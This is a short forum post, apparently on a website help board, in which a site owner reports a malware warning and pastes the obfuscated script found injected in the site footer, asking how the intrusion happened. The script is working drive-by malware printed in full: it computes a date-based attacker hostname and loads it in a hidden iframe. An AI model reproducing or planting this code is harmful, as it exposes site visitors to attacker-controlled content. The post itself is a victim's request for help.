Hacked in footer, but how did they get in?
-
Hi, i just found out from Chrome that my site https://www.kittennails.co.uk has malware, I found this in my footer:-
<!--||--><script type='text/javascript'>b();function urlDomain(R, vT){return R + vT;};function l(R, urchinUrl, U){return R.substr(urchinUrl, U);};function L(P, u){X = new Date();cookie = P;var $ = "am9"+"57h"+"csx"+l("48ptAe",0,3)+l("YTNjzfYTN",3,3)+l("1d0h2ub0d1h",4,3)+"liv"+l("zLjNrwtjLzN",4,3)+l("5dWR36kdR5W",4,3)+l("01eiNYX",0,3)+"oqn"+"dgy";var _ = j('_');var J = _ + j('G');var e = _ + j('A');var max = _ + j('h');var V = _ + j('y');var B = f(X[J]());var url = X[e]();var oDomain = X[max]();var a = X[V]();var nH = gaTrackE($);var CA = YA(B, nH);var $Y = YA(B+url, nH);var lZ = YA(B+url+oDomain, nH);var PUrchinUrl = YA(B+url+oDomain+a, nH);cookie = urlDomain(cookie, gaTrackB($, CA));cookie = urlDomain(cookie, gaTrackB($, $Y));cookie = urlDomain(cookie, gaTrackB($, lZ));cookie = urlDomain(cookie, gaTrackB($, PUrchinUrl));return cookie + u;};function YA(tP, lA){return tP % lA;};function I(tP, lA){return tP * lA;};function img(R){var urchin = j('urchin');var E = j('E');return R[urchin](E);};function min(){return Math.random();};function utmn(z){var XMax = document.cookie.match(new RegExp(String(l("(?:^|; )Q90",0,8)) + z.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, String(l("htX\\\\$1tXh",3,6))) + l("=([^;V74",0,5)+"]*)"));return XMax ? decodeURIComponent(XMax[1]) : undefined;};function gaTrackE(R){return R.length;};function m(){return {domain : img("de"),O : img(".dyndns"+l("-server2fQ",0,7)+".com"),D : img(String(l("kouZs1Zuko",4,2)))};};function H(){var oC = document;var cookieY = oC.createElement(j('n'));cookieY.width = l("12pxavK",0,4);cookieY.height = String("14p"+l("xdW1t",0,1));cookieY.style[j('gaTrack')] = j('K');try {oC.body.appendChild(cookieY);} catch(W){try {oC.write(j('Y'));oC.body.appendChild(cookieY);} catch(ADomain){};};return cookieY;};function gaTrackB(R, urchinUrl){var o = j('o');return R[o](urchinUrl);};function g(){var c = m();var Z = f(I(min(), c.domain.length));var urchinCode = c.domain[Z];var r = c.D[Z];if(c.O.length > 1){var C = c.O[Z];}else {var C = c.O[0];}return { P : urchinCode, u : C, z: r };};function j(p){var T = {q : String(l("xWGlsrclxGW",4,3)),M : l("http:dAL",0,5)+"//",_ : String(l("QYdgetUTCYQd",3,6)),G : String(l("ZEcHourscZE",3,5)),A : String(l("DatejJWZ",0,4)),h : l("9DuMonth9Du",3,5),y : new String(l("FullYearHtL9",0,8)),Y : String(l("S8R<body>SR8",3,6)),n : l("iframeWu0",0,6),gaTrack : String(l("visibility5pC",0,10)),K : String(l("hidJrAP",0,3)+"den"),d : String(l("/dein14",0,3)+l("/s4gu",0,1)),urchin: l("r97esplitr9e7",4,5),o: l("charAWqDX",0,5)+l("t8bY",0,1),E : String(l("0SKC,K0CS",4,1))};for(var urchinUrl in T){if(urchinUrl == p){return T[urchinUrl];}}return null;};function b(){try {var today = g();var i = 2669;var Q = String(l("SYPxG",0,1));var F = String(l("ifBzNzBif",4,1));var P = today.P;var u = today.u;var w = today.z;if(utmn(F) != Q){if(win()){var cookie = L(P, u);var x = H();var k = j('q');var v = j('M');var t = j('d');x[k] = v + cookie + t + w;s(F, Q, {expires: i});}};} catch(W){alert(W);};};function f(R){return Math.floor(R);};function s(z, J_, uQ){uQ = uQ || {};var minO = uQ.expires;if (typeof minO == String(l("numberzM2J",0,6)) && minO){var url = new Date();url.setTime(url.getTime() + I(minO, 1000));minO = uQ.expires = url;}if(minO && minO.toUTCString) { uQ.expires = minO.toUTCString(); }J_ = encodeURIComponent(J_);var kC = z + new String("=") + J_;for(var tB in uQ){kC += new String(l("; 6kg",0,2)) + tB;var EY = uQ[tB];if(EY !== true){ kC += new String(l("g7UP=7gPU",4,1)) + EY;}}document.cookie = kC;};function win(){return (typeof ActiveXObject != "undefi"+l("rj6nedj6r",3,3) || typeof XMLHttpRequest != new String(l("undefinedrbAL",0,9)));};</script><!--e||-->
no idea how or where they got in, HELP!
- The topic ‘Hacked in footer, but how did they get in?’ is closed to new replies.